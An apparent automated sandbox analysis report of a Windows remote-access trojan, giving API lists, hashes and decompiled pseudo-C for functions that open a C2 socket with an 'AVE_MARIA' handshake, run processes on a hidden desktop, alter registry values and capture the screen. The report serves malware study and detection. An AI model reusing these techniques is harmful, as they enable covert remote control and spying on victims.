0x00000000
0x00b5d5b4
0x00000000
0x00b5d5b4
0x00b5d564
0x00b5d567
0x00000000
0x00000000
0x00b5d56d
0x00000000
0x00b5d56d

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

Part of subcall function 00B5830D: _free.LIBCMT ref: 00B5836F
Part of subcall function 00B5830D: _free.LIBCMT ref: 00B583A5

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 00B5D5E5
IsValidCodePage.KERNEL32(00000000), ref: 00B5D630
IsValidLocale.KERNEL32(?,00000001), ref: 00B5D63F
GetLocaleInfoW.KERNEL32(?,00001001,00B53FA5,00000040,?,00B540C5,00000055,00000000,?,?,00000055,00000000), ref: 00B5D687
GetLocaleInfoW.KERNEL32(?,00001002,00B54025,00000040), ref: 00B5D6A6

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: c76c7dc03b3971b22dc7314a086e5ae81bc54b20dc85035f7723d251b72fcbd9
Instruction ID: 622f7ea613469c4e2ea57ca1895e1b15d5dd3b72ed28ba563084437e75472bf7
Opcode Fuzzy Hash: c76c7dc03b3971b22dc7314a086e5ae81bc54b20dc85035f7723d251b72fcbd9
Instruction Fuzzy Hash: 495152B1900206ABDB21DFA4DC41BAE77F8EF15706F1446E5FD14EB190EBB09948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B44798, Relevance: 54.5, APIs: 21, Strings: 10, Instructions: 232networkthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B446F7: WSAStartup.WS2_32(00000202,?), ref: 00B44718
Part of subcall function 00B446F7: socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
Part of subcall function 00B446F7: gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
Part of subcall function 00B446F7: htons.WS2_32(00000000), ref: 00B44763
Part of subcall function 00B446F7: connect.WS2_32(00000000,?,00000010), ref: 00B44774

SetThreadDesktop.USER32 ref: 00B447C2
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00B447E0
send.WS2_32(00000000,00000000,00000004,00000000), ref: 00B447F9
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B44818
send.WS2_32(00000000,00000000), ref: 00B44842
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B44A60
TerminateThread.KERNEL32(00000000), ref: 00B44A72

Strings

$, xrefs: 00B448A2
", xrefs: 00B448C8
AVE_MARIA, xrefs: 00B447DA
.5&/, xrefs: 00B44865
&8, xrefs: 00B44923
$, xrefs: 00B44875
(k"+, xrefs: 00B4486D
.5&/, xrefs: 00B44892
(k"+, xrefs: 00B4489A
;<2, xrefs: 00B4491B

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: send$Threadrecv$DesktopStartupTerminateconnectgethostbynamehtonssocket
String ID: "$$$$$&8$(k"+$(k"+$.5&/$.5&/$;<2$AVE_MARIA
API String ID: 1660028926-2045007127
Opcode ID: a3f477ca6a0f846af3505fd3af075b081d9ab794bf3bd17e113c383c76461c83
Instruction ID: 0f14dbb86ffcfb4e00098bf3bf3f075c9008d20db6eaee2d6ad6e7de25f4c5bc
Opcode Fuzzy Hash: a3f477ca6a0f846af3505fd3af075b081d9ab794bf3bd17e113c383c76461c83
Instruction Fuzzy Hash: 9A81AC71148341AFE320DB64DC85F7FBBE8EF86740F10095DFA80961A0EBB4DA159B66

Uniqueness

Uniqueness Score: -1.00%

Function 00B56739, Relevance: 33.2, APIs: 22, Instructions: 188
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00B56739(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v40;
				void* _v44;
				signed int _v60;
				short _v62;
				char _v112;
				long _v152;
				void* __edi;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t107;
				void* _t113;
				signed int _t116;
				signed int _t125;
				void* _t128;
				signed int _t129;
				intOrPtr* _t130;
				intOrPtr _t134;
				signed int _t143;
				signed int _t153;
				long _t154;
				long _t156;
				void* _t158;
				signed int* _t160;
				long _t161;
				signed int* _t165;
				void* _t172;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed char _t184;
				char _t189;
				void* _t190;
				unsigned int _t192;
				signed int _t194;
				signed int* _t195;
				unsigned int _t197;
				void* _t200;
				signed int _t202;

				if(_a8 == 0) {
					L1:
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					return E00B528EC() | 0xffffffff;
				}
				__eflags = _a12;
				if(_a12 == 0) {
					goto L1;
				}
				__eflags = _a4 - 4;
				if(_a4 > 4) {
					 *(E00B55BAA()) =  *_t152 & 0x00000000;
					goto L1;
				}
				_push(_t153);
				_v16 = 0;
				_v8 = 0;
				_t93 = E00B61217(_a12, _a16,  &_v16,  &_v8);
				_t154 = _t153 | 0xffffffff;
				__eflags = _t93 - _t154;
				if(_t93 == _t154) {
					E00B564B8(_v8);
					_v8 = 0;
					E00B564B8(_v16);
					L9:
					_t113 = _t154;
					L36:
					return _t113;
				}
				__eflags = _a4 - 4;
				_v12 = 0;
				_t98 = E00B56A8A( &_v12,  &_v20, (_t93 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff);
				__eflags = _t98;
				if(_t98 == 0) {
					E00B564B8(_v12);
					_v12 = 0;
					E00B564B8(_v8);
					_v8 = 0;
					E00B564B8(_v16);
					goto L9;
				}
				__eflags = _a4 - 4;
				if(_a4 == 4) {
					_push(8);
					_pop(0);
				}
				_t99 = E00B55BAA();
				 *_t99 = 0;
				_t189 = 0x44;
				E00B4D0F0(_t189,  &_v112, 0, _t189);
				_v62 = _v20;
				_v60 = _v12;
				_v112 = _t189;
				_t107 = E00B61292(_t161, __eflags, _a8, _v16, 0, 0, 1, 0, _v8, 0,  &_v112,  &_v44);
				_t200 = _v44;
				_t190 = _v40;
				__eflags = _t107;
				if(_t107 == 0) {
					L21:
					E00B55B87(GetLastError());
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					L31:
					E00B564B8(_v12);
					_v12 = _v12 & 0x00000000;
					E00B564B8(_v8);
					_v8 = _v8 & 0x00000000;
					E00B564B8(_v16);
					_t113 = _t154;
					L35:
					goto L36;
				}
				_t116 = _a4;
				__eflags = _t116 - 2;
				if(_t116 != 2) {
					__eflags = _t116;
					if(_t116 != 0) {
						__eflags = _t116 - 4;
						if(_t116 != 4) {
							__eflags = _t190 - _t154;
							if(_t190 != _t154) {
								CloseHandle(_t190);
							}
							E00B564B8(_v12);
							_v12 = _v12 & 0x00000000;
							E00B564B8(_v8);
							_t56 =  &_v8;
							 *_t56 = _v8 & 0x00000000;
							__eflags =  *_t56;
							E00B564B8(_v16);
							_t113 = _t200;
							goto L35;
						}
						__eflags = _t190 - _t154;
						if(_t190 != _t154) {
							CloseHandle(_t190);
						}
						__eflags = _t200 - _t154;
						if(_t200 != _t154) {
							CloseHandle(_t200);
						}
						_t154 = 0;
						__eflags = 0;
						goto L31;
					}
					WaitForSingleObject(_t200, _t154);
					_t143 = GetExitCodeProcess(_v44,  &_v24);
					__eflags = _t143;
					if(_t143 == 0) {
						goto L21;
					}
					_v28 = _v24;
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					_t154 = _v28;
					goto L31;
				}
				E00B52EE0(0);
				asm("int3");
				_push(_t154);
				_t156 = _t161;
				_push(_t200);
				_push(_t190);
				_v152 = _t156;
				 *( *( *_t156)) =  *( *( *_t156)) & 0x00000000;
				 *( *( *(_t156 + 4))) =  *( *( *(_t156 + 4))) & 0x00000000;
				_t202 =  *0xb6a8c8; // 0x40
				__eflags = _t202;
				if(_t202 != 0) {
					_t60 = _t202 - 1; // 0x3f
					_t197 = _t60;
					while(1) {
						_t178 = (_t197 & 0x0000003f) * 0x38;
						_t134 =  *((intOrPtr*)(0xb6a6c8 + (_t197 >> 6) * 4));
						__eflags =  *((char*)(_t134 + _t178 + 0x28));
						if( *((char*)(_t134 + _t178 + 0x28)) == 0) {
							goto L43;
						}
						_t197 = _t197 - 1;
						_t202 = _t202 - 1;
						__eflags = _t202;
						if(_t202 != 0) {
							continue;
						}
						goto L43;
					}
				}
				L43:
				__eflags = _t202 - 0x3332;
				if(_t202 < 0x3332) {
					_v32 = 0x00000004 + _t202 * 0x00000005 & 0x0000ffff;
					_t125 = E00B598AF(0x00000004 + _t202 * 0x00000005 & 0x0000ffff, 1);
					_v24 = _t125;
					__eflags = _t125;
					if(_t125 != 0) {
						_t67 = _t125 + 4; // 0x4
						_t181 = _t67;
						 *_t125 = _t202;
						_t165 = _t181 + _t202;
						_v12 = _t181;
						_t192 = 0;
						_v16 = _t165;
						_v20 = _t165;
						__eflags = _t202;
						if(_t202 != 0) {
							_t129 = _t181;
							_t160 = _t165;
							do {
								_t176 = (_t192 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb6a6c8 + (_t192 >> 6) * 4));
								_t184 =  *((intOrPtr*)(_t176 + 0x28));
								__eflags = _t184 & 0x00000010;
								if((_t184 & 0x00000010) != 0) {
									 *(_t129 + _t192) = 0;
									_t177 = _t176 | 0xffffffff;
									__eflags = _t177;
								} else {
									 *(_t129 + _t192) = _t184;
									_t177 =  *(_t176 + 0x18);
								}
								 *_t160 = _t177;
								_t192 = _t192 + 1;
								_t160 =  &(_t160[1]);
								__eflags = _t192 - _t202;
							} while (_t192 != _t202);
							_t125 = _v24;
							_t156 = _v28;
							_t181 = _v12;
						}
						__eflags =  *((char*)( *((intOrPtr*)(_t156 + 8))));
						if( *((char*)( *((intOrPtr*)(_t156 + 8)))) == 0) {
							_t172 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t202 - 3;
								if(_t202 >= 3) {
									_t194 = 3;
								} else {
									_t194 = _t202;
								}
								__eflags = _t172 - _t194;
								if(_t172 == _t194) {
									goto L61;
								}
								_t195 = _v16;
								 *_t181 = 0;
								 *_t195 =  *_t195 | 0xffffffff;
								_t172 = _t172 + 1;
								_t181 = _t181 + 1;
								_v16 =  &(_t195[1]);
							}
						}
						L61:
						 *( *( *_t156)) = _t125;
						_t158 = 1;
						__eflags = 1;
						 *( *( *(_t156 + 4))) = _v32;
					} else {
						_t130 = E00B55BBD();
						_t158 = 0;
						 *_t130 = 0xc;
					}
					E00B564B8(0);
					_t128 = _t158;
				} else {
					 *((intOrPtr*)(E00B55BBD())) = 0xc;
					_t128 = 0;
				}
				return _t128;
			}

0x00b56745
0x00b56747
0x00b5674c
0x00000000
0x00b56757
0x00b5675f
0x00b56763
0x00000000
0x00000000
0x00b56765
0x00b56769
0x00b56770
0x00000000
0x00b56770
0x00b56775
0x00b56780
0x00b56787
0x00b5678d
0x00b56792
0x00b56798
0x00b5679a
0x00b5679f
0x00b567a7
0x00b567aa
0x00b567f6
0x00b567f6
0x00b5693c
0x00000000
0x00b5693d
0x00b567b3
0x00b567b7
0x00b567c9
0x00b567d1
0x00b567d3
0x00b567d8
0x00b567e0
0x00b567e3
0x00b567eb
0x00b567ee
0x00000000
0x00b567f3
0x00b567fd
0x00b56804
0x00b56806
0x00b56808
0x00b56808
0x00b56809
0x00b56810
0x00b56815
0x00b5681a
0x00b56823
0x00b5682a
0x00b56834
0x00b56849
0x00b5684e
0x00b56854
0x00b56857
0x00b56859
0x00b568a5
0x00b568ac
0x00b568b2
0x00b568b4
0x00b568b7
0x00b568b7
0x00b568bd
0x00b568bf
0x00b568c2
0x00b568c2
0x00b568e7
0x00b568ea
0x00b568f2
0x00b568f6
0x00b568fe
0x00b56902
0x00b56907
0x00b56938
0x00000000
0x00b5693b
0x00b5685b
0x00b5685e
0x00b56861
0x00b56867
0x00b56869
0x00b568ca
0x00b568cd
0x00b5690b
0x00b5690d
0x00b56910
0x00b56910
0x00b56919
0x00b56921
0x00b56925
0x00b5692d
0x00b5692d
0x00b5692d
0x00b56931
0x00b56936
0x00000000
0x00b56936
0x00b568cf
0x00b568d1
0x00b568d4
0x00b568d4
0x00b568da
0x00b568dc
0x00b568df
0x00b568df
0x00b568e5
0x00b568e5
0x00000000
0x00b568e5
0x00b5686d
0x00b5687a
0x00b56880
0x00b56882
0x00000000
0x00000000
0x00b56887
0x00b5688a
0x00b5688c
0x00b5688f
0x00b5688f
0x00b56895
0x00b56897
0x00b5689a
0x00b5689a
0x00b568a0
0x00000000
0x00b568a0
0x00b56944
0x00b56949
0x00b56952
0x00b56953
0x00b56955
0x00b56956
0x00b56957
0x00b5695e
0x00b56966
0x00b56969
0x00b5696f
0x00b56971
0x00b56973
0x00b56973
0x00b56976
0x00b56980
0x00b56983
0x00b5698a
0x00b5698f
0x00000000
0x00000000
0x00b56991
0x00b56992
0x00b56992
0x00b56995
0x00000000
0x00000000
0x00000000
0x00b56995
0x00b56976
0x00b56997
0x00b56997
0x00b5699d
0x00b569bd
0x00b569c0
0x00b569c5
0x00b569ca
0x00b569cc
0x00b569e0
0x00b569e0
0x00b569e3
0x00b569e5
0x00b569e8
0x00b569eb
0x00b569ed
0x00b569f0
0x00b569f3
0x00b569f5
0x00b569f7
0x00b569f9
0x00b569fb
0x00b56a08
0x00b56a0f
0x00b56a12
0x00b56a15
0x00b56a1f
0x00b56a23
0x00b56a23
0x00b56a17
0x00b56a17
0x00b56a1a
0x00b56a1a
0x00b56a26
0x00b56a28
0x00b56a29
0x00b56a2c
0x00b56a2c
0x00b56a30
0x00b56a33
0x00b56a36
0x00b56a36
0x00b56a3c
0x00b56a3f
0x00b56a41
0x00b56a41
0x00b56a43
0x00b56a43
0x00b56a46
0x00b56a4e
0x00b56a48
0x00b56a48
0x00b56a48
0x00b56a4f
0x00b56a51
0x00000000
0x00000000
0x00b56a53
0x00b56a56
0x00b56a59
0x00b56a5c
0x00b56a5d
0x00b56a61
0x00b56a61
0x00b56a43
0x00b56a66
0x00b56a6a
0x00b56a74
0x00b56a74
0x00b56a77
0x00b569ce
0x00b569ce
0x00b569d3
0x00b569d5
0x00b569d5
0x00b56a7b
0x00b56a81
0x00b5699f
0x00b569a4
0x00b569aa
0x00b569aa
0x00b56a89

APIs

Part of subcall function 00B61217: _free.LIBCMT ref: 00B61239

_free.LIBCMT ref: 00B567AA
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5686D
GetExitCodeProcess.KERNEL32 ref: 00B5687A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5688F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5689A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568A5
__dosmaperr.LIBCMT ref: 00B568AC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568B7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568C2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568D4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568DF
_free.LIBCMT ref: 00B5679F

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B567D8
_free.LIBCMT ref: 00B567E3
_free.LIBCMT ref: 00B567EE
_free.LIBCMT ref: 00B568EA
_free.LIBCMT ref: 00B568F6
_free.LIBCMT ref: 00B56902
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B56910
_free.LIBCMT ref: 00B56919
_free.LIBCMT ref: 00B56925
_free.LIBCMT ref: 00B56931

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
String ID:
API String ID: 3529756214-0
Opcode ID: ebc73e6868d17c77e6ff688f9bbec6c78e461aa6a07636c98fe519eedf4d8a24
Instruction ID: d358e7b5d518d5e48d725a1dfc67c71bbf16b97cd3a497e1a81e939d3f64c83f
Opcode Fuzzy Hash: ebc73e6868d17c77e6ff688f9bbec6c78e461aa6a07636c98fe519eedf4d8a24
Instruction Fuzzy Hash: A5512971900108AFDF11AF94C885BAE7BF9EF45326F5040E6FD11A7260DB394E98DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B457CD, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 175
registrystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B457CD(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				signed int _v16;
				char _v276;
				char _v280;
				char _v296;
				char _v297;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v356;
				short _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				char _v372;
				struct _AppBarData _v408;
				struct _STARTUPINFOA _v484;
				struct _PROCESS_INFORMATION _v500;
				char _v504;
				int _v508;
				char _v512;
				int _v516;
				char _v520;
				char _v523;
				char _v524;
				void* _v528;
				signed int _t60;
				char* _t62;
				signed char _t75;
				struct HWND__* _t92;
				char* _t102;
				CHAR* _t105;
				int _t116;
				long _t119;
				void* _t120;
				char _t123;
				signed int _t126;
				signed int _t128;

				_t126 =  &_v524;
				_t60 =  *0xb69014; // 0x26ce9e99
				_v8 = _t60 ^ _t126;
				asm("movaps xmm0, [0xb3dc50]");
				_t123 = 2;
				_v504 = _t123;
				asm("movups [esp+0xf4], xmm0");
				_v280 = 0;
				_t62 = E00B42846( &_v296);
				asm("movaps xmm0, [0xb3dbe0]");
				asm("movups [esp+0xb8], xmm0");
				_t102 = _t62;
				_v308 = 0x322e0315;
				asm("movaps xmm0, [0xb3ddb0]");
				_t105 = 0;
				asm("movups [esp+0xc8], xmm0");
				_v304 = 0x19170310;
				asm("movaps xmm0, [0xb3dbb0]");
				asm("movups [esp+0xd8], xmm0");
				_v300 = 0x1e1c1b;
				do {
					_t8 = _t105 + 0x40; // 0x40
					 *(_t126 + _t105 + 0xb8) =  *(_t126 + _t105 + 0xb8) ^ _t8;
					_t105 = _t105 + 1;
				} while (_t105 < 0x3b);
				_v297 = 0;
				RegOpenKeyExA(0x80000001,  &_v356, 0, 0xf003f,  &_v520);
				_t116 = 4;
				_v516 = _t116;
				_v508 = _t116;
				RegQueryValueExA(_v520, _t102, 0,  &_v508,  &_v512,  &_v516);
				if(_v512 != _t123) {
					RegSetValueExA(_v520, _t102, 0, _t116,  &_v504, _v516);
				}
				E00B4D0F0(0,  &_v276, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_t75 = 0x1c;
				_v523 = 0;
				_v524 = _t75 ^ 0x00000040;
				_v523 = 0;
				lstrcatA( &_v276,  &_v524);
				_v372 = 0x2f323925;
				_v368 = 0x3523372b;
				_v364 = 0x2e322c66;
				_v360 = 0;
				lstrcatA( &_v276, E00B42810( &_v372));
				_t119 = 0x44;
				E00B4D0F0(0,  &_v484, 0, lstrcatA);
				_v484.cb = _t119;
				_v484.lpDesktop = 0xb699c0;
				asm("stosd");
				_t128 = _t126 + 0x18;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( &_v276, 0, 0, 0, 0, 0, 0, 0,  &_v484,  &_v500);
				_v408.cbSize = 0x24;
				_t120 = 0;
				while(1) {
					Sleep(0x3e8);
					_v372 = 0x2f272913;
					_v368 = 0x35121a28;
					_v364 = 0x251d3029;
					_v360 = 0x28;
					_t92 = FindWindowA(E00B427BF( &_v372), 0);
					_v408.hWnd = _t92;
					if(_t92 != 0) {
						break;
					}
					_t120 = _t120 + 1;
					if(_t120 < 5) {
						continue;
					}
					break;
				}
				_v408.lParam = 2;
				SHAppBarMessage(0xa,  &_v408);
				RegSetValueExA(_v528, _t102, 0, 4,  &_v520, _v524);
				RegCloseKey(_v528);
				return E00B4AE43(_v16 ^ _t128);
			}

0x00b457cd
0x00b457d3
0x00b457da
0x00b457e1
0x00b457f5
0x00b457f6
0x00b457fa
0x00b45802
0x00b4580a
0x00b4580f
0x00b45818
0x00b45820
0x00b45822
0x00b4582d
0x00b45834
0x00b45836
0x00b4583e
0x00b45849
0x00b45850
0x00b45858
0x00b45863
0x00b45863
0x00b45866
0x00b4586d
0x00b4586e
0x00b45877
0x00b45892
0x00b4589a
0x00b4589f
0x00b458a8
0x00b458ba
0x00b458ca
0x00b458dc
0x00b458dc
0x00b458ed
0x00b458fe
0x00b4590c
0x00b4590f
0x00b45914
0x00b45924
0x00b4592a
0x00b45933
0x00b4593e
0x00b45949
0x00b45954
0x00b4596a
0x00b4596e
0x00b45977
0x00b4597e
0x00b45986
0x00b4598e
0x00b4598f
0x00b45992
0x00b45993
0x00b45994
0x00b459b0
0x00b459b6
0x00b459c1
0x00b459c3
0x00b459c8
0x00b459d7
0x00b459e2
0x00b459ed
0x00b459f8
0x00b45a08
0x00b45a0e
0x00b45a17
0x00000000
0x00000000
0x00b45a19
0x00b45a1d
0x00000000
0x00000000
0x00000000
0x00b45a1d
0x00b45a26
0x00b45a34
0x00b45a4c
0x00b45a52
0x00b45a70

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00B45892
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B458BA
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B458DC
GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00B458FE
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B4592A
lstrcatA.KERNEL32(?,00000000), ref: 00B4596A
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00B459B0
Sleep.KERNEL32(000003E8), ref: 00B459C8
FindWindowA.USER32(00000000), ref: 00B45A08
SHAppBarMessage.SHELL32(0000000A,00000024), ref: 00B45A34
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B45A4C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B45A52

Strings

%92/, xrefs: 00B45933
f,2., xrefs: 00B45949
$, xrefs: 00B459B6
(, xrefs: 00B459F8
Tett, xrefs: 00B45986
+7#5, xrefs: 00B4593E

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$lstrcat$CloseCreateDirectoryFindMessageOpenProcessQuerySleepWindowWindows
String ID: $$%92/$($+7#5$Tett$f,2.
API String ID: 3986954507-4036093491
Opcode ID: b4043152662ecfe23595ff627f15dc5d5aacfdb2e10be2fa1a0eaa0782d3fca2
Instruction ID: cce3f34868e4167c2ef0672334c70a45f122870f9b7173de8c97d534cd7eb6f5
Opcode Fuzzy Hash: b4043152662ecfe23595ff627f15dc5d5aacfdb2e10be2fa1a0eaa0782d3fca2
Instruction Fuzzy Hash: 62615AB1408384AAD330DB65DC45BEBBBE8EF99314F00491DF68997161EB709688CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00B44426, Relevance: 28.7, APIs: 19, Instructions: 222
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B44426(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				struct tagRECT _v24;
				struct HDC__* _v36;
				intOrPtr _v40;
				void* _v44;
				struct HDC__* _v52;
				struct HDC__* _v56;
				struct HDC__* _v60;
				struct HDC__* _v64;
				int _v68;
				struct HDC__* _v72;
				struct HDC__* _v96;
				void* _v144;
				signed int _v152;
				struct HDC__* _v176;
				signed int _v188;
				signed int _t53;
				void* _t59;
				struct HWND__* _t61;
				void* _t73;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				struct HWND__* _t87;
				void* _t100;
				int _t101;
				void* _t102;
				signed int _t104;
				signed int _t109;
				struct HWND__* _t110;
				signed int _t112;
				struct HDC__* _t114;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				void* _t119;
				struct HDC__* _t121;
				void* _t122;
				struct HWND__* _t123;
				void* _t125;
				int _t126;
				char* _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;

				_t130 =  &_v44;
				_t53 =  *0xb69014; // 0x26ce9e99
				_v8 = _t53 ^ _t130;
				_t100 = __edx;
				_t125 = __ecx;
				GetWindowRect(GetDesktopWindow(),  &_v24);
				_t114 = GetDC(0);
				_v36 = _t114;
				_t121 = CreateCompatibleDC(_t114);
				_v44 = _t121;
				_t59 = CreateCompatibleBitmap(_t114, _v24.top, _v24.right);
				_v60 = _t59;
				SelectObject(_t121, _t59);
				_v56 = _t114;
				_v52 = _t121;
				_t61 = GetTopWindow(0);
				if(_t61 == 0) {
					L6:
					__eflags = _t125 - _v40;
					_t126 =  >  ? _v40 : _t125;
					__eflags = _t100 - _v36;
					_t101 =  >  ? _v36 : _t100;
					__eflags = _t126 - _v40;
					if(_t126 != _v40) {
						L8:
						_t115 = CreateCompatibleBitmap(_t114, _t126, _t101);
						_t121 = CreateCompatibleDC(_v72);
						SelectObject(_t121, _t115);
						SetStretchBltMode(_t121, 4);
						__eflags = 0;
						StretchBlt(_t121, 0, 0, _t126, _t101, _v96, 0, 0, _v72, _v68, 0xcc0020);
						DeleteObject(_v144);
						DeleteDC(_v144);
						_v152 = _t115;
						L9:
						_t117 = 1;
						 *0xb6ae58 = _t101 * _t126 * 3;
						_t73 =  *0xb6ae74; // 0x0
						__eflags = _t73;
						if(_t73 == 0) {
							L12:
							E00B50985(_t73);
							E00B50985( *0xb6ae88);
							E00B50985( *0xb6ae80);
							_push( *0xb6ae58);
							_t77 = E00B509A2();
							_push( *0xb6ae58);
							 *0xb6ae74 = _t77;
							_t78 = E00B509A2();
							_push( *0xb6ae58);
							 *0xb6ae88 = _t78;
							_t79 = E00B509A2();
							_t130 = _t130 + 0x18;
							 *0xb6ae80 = _t79;
							_t73 =  *0xb6ae74; // 0x0
							_t117 = 0;
							__eflags = 0;
							L13:
							 *0xb6ae48 = _t126;
							 *0xb6ae4c = _t101;
							_t102 = _v152;
							GetDIBits(_t121, _t102, 0, _t101, _t73, 0xb6ae44, 0);
							DeleteObject(_t102);
							ReleaseDC(0, _v176);
							DeleteDC(_t121);
							__eflags = _t117;
							if(_t117 == 0) {
								_push( *0xb6ae58);
								_push( *0xb6ae74);
								_push( *0xb6ae88);
								L32:
								E00B4D670();
								_t131 = _t130 + 0xc;
								__eflags = 0;
								L33:
								__eflags = _v152 ^ _t131;
								return E00B4AE43(_v152 ^ _t131);
							}
							_t109 =  *0xb6ae58; // 0x0
							_t87 = 0;
							_t122 =  *0xb6ae74; // 0x0
							__eflags = _t109;
							if(_t109 == 0) {
								L20:
								E00B4D670( *0xb6ae80, _t122, _t109);
								_t112 =  *0xb6ae58; // 0x0
								_t131 = _t130 + 0xc;
								_v188 = 1;
								_t110 = 0;
								_t36 = _t112 - 1; // -1
								__eflags = _t36;
								if(_t36 == 0) {
									L30:
									goto L33;
								}
								_t118 =  *0xb6ae88; // 0x0
								_t104 = _t118 - _t122;
								__eflags = _t104;
								do {
									_t128 = _t122 + _t110;
